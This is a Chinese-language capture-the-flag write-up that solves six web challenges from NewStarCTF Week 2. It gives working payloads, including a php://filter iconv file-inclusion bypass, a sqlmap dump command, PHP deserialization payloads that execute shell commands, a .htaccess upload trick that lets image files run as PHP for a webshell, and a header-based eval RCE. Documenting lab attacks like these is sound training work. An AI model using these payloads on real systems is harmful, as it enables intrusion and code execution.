【Web】NewStarCtf Week2 个人复现

目录

①游戏高手

②include 0。0 

③ez_sql

④Unserialize? 

⑤Upload again!

⑥ R!!C!!E!!


①游戏高手

经典前端js小游戏

【Web】NewStarCtf Week2 个人复现_第1张图片

检索与分数相关的变量 

 

 控制台直接修改分数拿到flag【Web】NewStarCtf Week2 个人复现_第2张图片

②include 0。0 

【Web】NewStarCtf Week2 个人复现_第3张图片

禁了base64和rot13 

尝试过包含/var/log/apache/access.log,php://input和data://均不行

没法子,只能上网检索别的过滤器了

payload

?file=php://filter//convert.iconv.SJIS*.UCS-4*/resource=flag.php

③ez_sql

【Web】NewStarCtf Week2 个人复现_第4张图片

在url发现注入点

 

sqlmap梭了 

python sqlmap.py -u "http://946dccab-ab98-4042-9583-64c9f46eaf8f.node4.buuoj.cn:81/?id=TMP0919" -D ctf -T here_is_flag -C flag --dump

 【Web】NewStarCtf Week2 个人复现_第5张图片

④Unserialize? 

【Web】NewStarCtf Week2 个人复现_第6张图片

构造:

不可见字符用%00代替 

payload:

unser=O:4:"evil":1:{s:9:"%00evil%00cmd";s:4:"ls /";}
unser=O:4:"evil":1:{s:9:"%00evil%00cmd";s:33:"nl /th1s_1s_fffflllll4444aaaggggg";}

⑤Upload again!

经过尝试不能上传php文件(后缀检测绕不过) 

随便输一段报错发现是apache

【Web】NewStarCtf Week2 个人复现_第7张图片

上传.htaccess

#define width 100;
#define height 100;
SetHandler application/x-httpd-php

上传yjh.png

GIF89a

 回显路径,访问连蚁剑即可

 

 

⑥ R!!C!!E!!

进来先让信息搜集

盲测/.git/,报Forbidden,说明是.git源码泄露

【Web】NewStarCtf Week2 个人复现_第8张图片

 一眼无参rce,过滤了一些东西【Web】NewStarCtf Week2 个人复现_第9张图片

先打打看

/bo0g1pop.php?star=print_r(getallheaders());

回显

【Web】NewStarCtf Week2 个人复现_第10张图片

发现UA在第二个

payload:

/bo0g1pop.php?star=eval(next(getallheaders()));

 改UA即可

【Web】NewStarCtf Week2 个人复现_第11张图片

 

你可能感兴趣的:(前端,CTF,WEB,安全,笔记,BUUCTF,NEWSTARCTF)